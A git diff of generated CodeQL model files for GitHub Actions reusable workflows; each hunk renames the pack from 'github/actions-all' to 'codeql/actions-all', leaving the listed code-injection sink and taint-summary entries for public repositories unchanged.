["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index e3e0a3460d4..cef0c9134aa 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index 01539c4329b..6c9f45dbad0 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index d26e49d3ef8..40856fa46b3 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index f5b370e3d59..807229fc6b5 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index 72659e36271..df2220211b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index f37d70a718d..7faea6b07ef 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 3b4ed4b18b5..43018d43110 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index 3dddb9bd3f9..eaf9a48f30f 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 49654eb84b8..b50566bcad6 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml index f46bcbee1b3..8bd7e837d38 100644 --- a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index e3791339c03..7b76f842451 100644 --- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index f5f6c919cfb..ee4636c6a2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 4747cd57c4d..5f1f9ea13ad 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index 3b68ca76fe2..d2188efb8ee 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index 62b99c23ff6..ed86bf9266b 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 84347b6cbfa..79a253fe25e 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index 32a3d5061e2..f78830a9f9a 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index d4ffc373678..789cdc003be 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index 5a5d3999ca7..a2d7f77b253 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index 9983ea4eee2..c3d0b1d8751 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index e8acf5f2c3c..35aeca022bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index bd7494ab69a..419d80970fa 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 89b60a4ac84..07841ba0a18 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index 7c72cb57dca..2501e39f850 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index 2e9681cb21e..2a1fd972192 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index d30f1bb7bba..46568f16fa6 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index 85771a98962..0bba5671572 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 194ac90b648..37bd78f271d 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index d013a9c1b8f..ebc6dfe01d2 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 57d88f54186..ab3c341b895 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index 312d9e193e7..78f8e605665 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index b62903a97e9..d4d377730af 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index e983a4a6c98..d8cb45c66a7 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index 4a45392e15d..2fc426809c2 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index ac20cdeeb3d..eee7b011b0c 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index f6876b3bc56..4dbaa756bc7 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 9785efe9637..f78ded292a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 3197652aadc..a0df95b6c75 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index f0ebfa17724..0538073273c 100644 
--- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index 74afc5c0cc5..d2d543b9cf8 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index fa145f6b625..77c35145d4e 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index ab486b47df2..68433b76341 100644 
--- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index dc402bc1e45..c99b0584510 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index b5d4d6e4bde..bbdee0166f8 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index 83b45112b86..caccb088339 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index c40044c852e..f2172a5aaef 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 01178790847..59e33f0b652 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index 9593323f325..ee54a015ebb 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index 7901da27836..5e750a24f30 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index ccb1bd24654..5622dd89b57 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all 